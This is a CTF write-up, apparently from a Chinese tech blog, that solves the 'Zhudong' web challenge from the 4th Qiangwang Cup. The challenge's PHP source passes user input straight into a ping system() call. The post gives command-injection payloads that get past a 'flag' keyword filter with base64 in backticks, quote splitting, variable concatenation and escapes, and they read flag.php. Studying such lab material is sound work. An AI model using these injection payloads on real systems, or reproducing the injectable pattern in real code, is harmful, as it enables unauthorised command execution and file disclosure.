第四届【强网杯】主动

最新推荐文章于 2023-02-16 14:39:30 发布
最新推荐文章于 2023-02-16 14:39:30 发布
阅读量1.3k 收藏
点赞数 3
分类专栏: 强网杯
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_46481239/article/details/108199007
版权

注意⚠️此题是“命令执行绕过”,不是“代码执行绕过”

下发题目打开,拿到源码

 <?php
highlight_file("index.php");

if(preg_match("/flag/i", $_GET["ip"]))
{
    die("no flag");
}

system("ping -c 3 $_GET[ip]");

?>

传入的参数如果匹配到了flag字符就输出“no flag”

测试一下,发现flag.php就在当前目录
在这里插入图片描述
如果要输出flag.php的内容,我们要构造payload:?ip=;cat ./flag.php 但是flag被过滤了

我们可以用base64编码绕过

将./flag.php 转换成base64编码形式
在这里插入图片描述

Li9mbGFnLnBocAo=

因为要输出当前目录的flag.php内容,我们还需再把编码形式转换回来再执行
构造:

echo 'Li9mbGFnLnBocAo=' | base64 -d

(注意:Linux系统在终端d要换成大写D,否则无法运行)

但是要让这一步被执行我们还需借助一个符号——反引号 `

反引号 ` 在linux命令行中起着 命令执行的作用 ,即将转换好的base64编码反回到命令中再执行
最终payload:

?ip=;cat `echo 'Li9mbGFnLnBocAo=' | base64 -d `

显示网页源代码
在这里插入图片描述

flag = "flag{I_like_qwb_web}

#其实还有更简单的方法
1.利用引号绕过(单引号双引号都行)

?ip=;cat ./fl''ag.php

在这里插入图片描述
2.利用变量去赋值绕过

?ip=;a=fl;b=ag;cat ./$a$b.php

在这里插入图片描述

(payload中也可以去除./ ,后面的我就不加了)

?ip=;cat fla\g.php

?ip=;cat fl$(9)ag.php

还有多种方法就不一一列举了。

F10NAF11pp3d
关注
  • 3
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
第四届强网杯部分wp
weixin_44110537的博客
08-24 301
babycrt 通过分析sign函数中的代码,可以得到以下的等式:(记sign输出的值为ans) ans=S(c1*c2)%pq m+1-c1=Se1%t1…1 m+1-c2=Se2%t2…2 e1d=1%t1-1…5 e2d=1%t2-1…6 ed=1%(p-1)(q-1) Sq=md%qt2 Sp=(m+k)d%pt1 n=pq 通过观察S的生成方法可以知道S是余数为(Sq,Sp) 模数为 (qt2,pt1)的一个共同解(CRT),于是有: md=S%qt2 (m+k)d=S%pt1 即: md=S%q
[第四届-强网杯]:upload
Keepb1ue的博客
08-24 4311
下载附件,是一个解压后是一个数据包,wireshark打开分析,很明显,这是一个文件上传的数据包,分析数据包内容: 很明显,是一个文件上传的数据包。 接着看看他到底上传了什么数据: 很明显,是上传了一张steghide.jpg的图片 那我们可以尝试着在数据包中将图片还原出来在上传图片的数据包中。 指定上传流量的会话,显示和保存的数据改为原始数据,然后将其保存为:steghide.jpg 接着利用WinHex从保存的原始文件中将上传的图片还原出来。 将之前保存的steghide.bin用WinHex打
[第四届-强网杯]:主动
Keepb1ue的博客
08-24 4312
源码: <?php highlight_file("index.php"); if(preg_match("/flag/i", $_GET["ip"])) { die("no flag"); } system("ping -c 3 $_GET[ip]"); ?> 很明显的命令执行 flag.php就在当前目录下,那么直接cat ./flag不就行了? 可人家将flag关键字过滤了,绕过的方法也很简单; 思路很简单:我们传进去的命令base64编码下,在解码执行即可 ?id=;c
2020第四届强网杯部分WP
李熠专用博客_白帽子一枚,人称低危终结者
08-24 1318
题目序号 主动 操作内容: 进入网址,阅读源码,发现是个命令执行的题。 先尝试ls命令列出所有文件,发现存在flag.php文件,猜测flag在该文件中。 然后尝试读取flag.php文件,但是正则匹配了flag关键词,需要使用通配符绕过,如:fla?.php,但是尝试cat、tail、head、more文件读取命令均无效,最后使用tac命令拿到flag。 flag值: flag{I_like_qwb_web} 题目序号 Funhash 操作内容: 进入网址,开始阅读源码,发现需要绕过三个不同的限制方
ctfshow php特性上
weixin_63231007的博客
05-30 873
web93 $num = $_GET['num']; if($num==4476){ die("no no no!"); } if(preg_match("/[a-z]/i", $num)){ die("no no no!"); } if(intval($num,0)==4476){ echo $flag; }else{ echo intval($num,0); } 使用进制计算:
【天格】战队-已解出题目附件-第六届“强网杯”全国网络安全挑战赛
08-01
【天格】战队在第六届“强网杯”全国网络安全挑战赛中展现出卓越的技能和深入的理解,这是一场集技术、策略与团队协作于一体的顶级赛事。挑战赛中的解题附件揭示了网络安全领域的多个关键知识点,涵盖了逆向工程、...
【天格】战队-未解出题目附件-第六届“强网杯”全国网络安全挑战赛
08-01
【天格】战队在第六届“强网杯”全国网络安全挑战赛中分享了多个未解出的题目附件,这些附件涵盖了网络安全领域的多个子领域,包括逆向工程、漏洞利用(PWN)、密码学(Crypto)以及杂项(Misc)。通过分析这些文件...
2019 第三届强网杯线上赛.zip
12-17
强网杯
强网杯 WriteUp By Nu1L
08-02
强网杯 WriteUp By Nu1L》是关于2022年第六届“强网杯”全国网络安全挑战赛的一份技术分析报告,由Nu1L团队撰写。在这篇WriteUp中,作者分享了他们在竞赛中遇到的各种挑战和解决策略,涵盖了Pwn、Reverse、Find_...
2018强网杯CTF-题目整理-校本图片Readme.zip
最新发布
12-18
强网杯 2018强网杯CTF___题目整理 │ ├── 01Misc-4题 │ ├── 题目名称:ai-nimals │ │ └── 题目名称:ai-nimals.mhtml │ ├── 题目名称:welcome │ │ └── 题目名称:welcome.mhtml │ ├── ...
2020强网杯部分题目复现
m0re's blog
08-27 2531
title: 强网杯赛后总结 tags: CTF 强网先锋 Funhash <?php include 'conn.php'; highlight_file("index.php"); //level 1 if ($_GET["hash1"] != hash("md4", $_GET["hash1"])) { die('level 1 failed'); } //level 2 if($_GET['hash2'] === $_GET['hash3'] || md5($_GET['ha.
<?php highlight_file('index.php'); include("flag.php"); $id=$_POST['id']; $json=json_decode($_GET['j...
weixin_35750953的博客
02-16 335
这是一段 PHP 代码。这段代码会显示文件 "index.php" 的内容,并包含文件 "flag.php"。它还会将 POST 请求中的 "id" 参数赋值给变量 $id,并将 GET 请求中的 "json" 参数解码为数组并赋值给变量 $json。如果 $id 等于 "wllmNB",则会执行下一个 if 语句。 ...
NSSCTF-SWPU新生赛
weixin_52033041的博客
10-12 2940
SWPU新生赛 Web gift_F12 右键查看源代码 caidao 页面就有木马密码,蚁剑连接即可 flag在/目录 jicao 源码: <?php highlight_file('index.php'); include("flag.php"); $id=$_POST['id']; $json=json_decode($_GET['json'],true); if ($id=="wllmNB"&&$json['x']=="wllm") {echo $flag;} ?>
CTFshow web(29-51) 命令执行
qq_37561898的博客
01-21 956
CTF,ctfshow,命令执行
2020 第四届强网杯 线上赛Web_Writeup
末初的CSDN博客
08-27 2684
赛题类型强网先锋主动uploadFunhashweb辅助WebMisc 强网先锋 主动 首先题目长这样, 很明显是考查命令执行绕过过滤字符 <?php highlight_file("index.php"); if(preg_match("/flag/i", $_GET["ip"])) { die("no flag"); } system("ping -c 3 $_GET[ip]"); ?> 执行多条命令可以使用;分号或者|管道符闭合上一条命令 绕过方法很多,自己网上找,这
【CTF WriteUp】2020第四届强网杯部分Crypto题解
cccchhhh6819的博客
08-24 7656
写在前边 强网杯还是难。。去年正赛赛题一道都不会,只能靠临时补充的强网先锋题目拿分的情景历历在目。今年也没好哪去,只能写一点是一点吧。 modestudy 这道题是一道六合一块密码大杂烩,考察基础知识与变换,六道小的题目全做完以后拿到flag。其中4、5、6三道题需要大量交互,因此答案不变,可以单次做完后保留答案一起提交。1、2、3三道题当场变换即可。 Stage 1 [$] challenge 1 [+] cookie:session=6b1f33a78c5b9c17;admin=0;checksum=5
2020第四届强网杯-强网先锋-Web辅助 writeup
lnjoy
09-13 1737
2020第四届强网杯,强网先锋的Web辅助详解。 本题考查php反序列化,反序列化字符串逃逸,__wakeup()绕过,使用16进制绕过关键字过滤。 题目给了源码,要求传入get参数username和password。 由源码可知,在index.php传入username和password后,会使用这两个参数创建player对象。将player对象序列化,经过write函数处理,最后写入以访问ip的md5为文件名的文件中。 if (isset($_GET['username']) && is
[GYCTF2020]Blacklist&&[强网杯 2019]随便注
uihijio的博客
05-06 470
因为2020blacklist是2019随便注的升级版,所以借着这个机会归纳一下 先做个比较两道题的不同处,由此可见blacklist是随便注的升级版。 blacklist比随便注多过滤了set,prepare,rename,alter。 过滤prepare,set是避免pdo预处理绕过 过滤rename,alter是避免修改表名的情况出现 而blacklist和随便注还有一种方法是handler...
2020强网杯 部分wp
fly夏天的博客
08-26 1669
2020强网杯 部分wp 彩笔参加了这次强网杯,感觉又被扎心,果然是得PWN者得天下。 1. BANK 这题虽然是个PWN,但是居然被我这个web小白做出来了,我感觉我这种做法是个非预期解,也不知道大佬是如何操作的。 首先,远程nc连接,提示解密拼接字符串的sha256加密。编写python脚本爆破。简易脚本如下: import hashlib,os s = 'a36MUMAX1VSQQcEHJ' #伪加密部分字符串 result = 'f8a38643f58bf7d6523d8c43f81a9329d
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值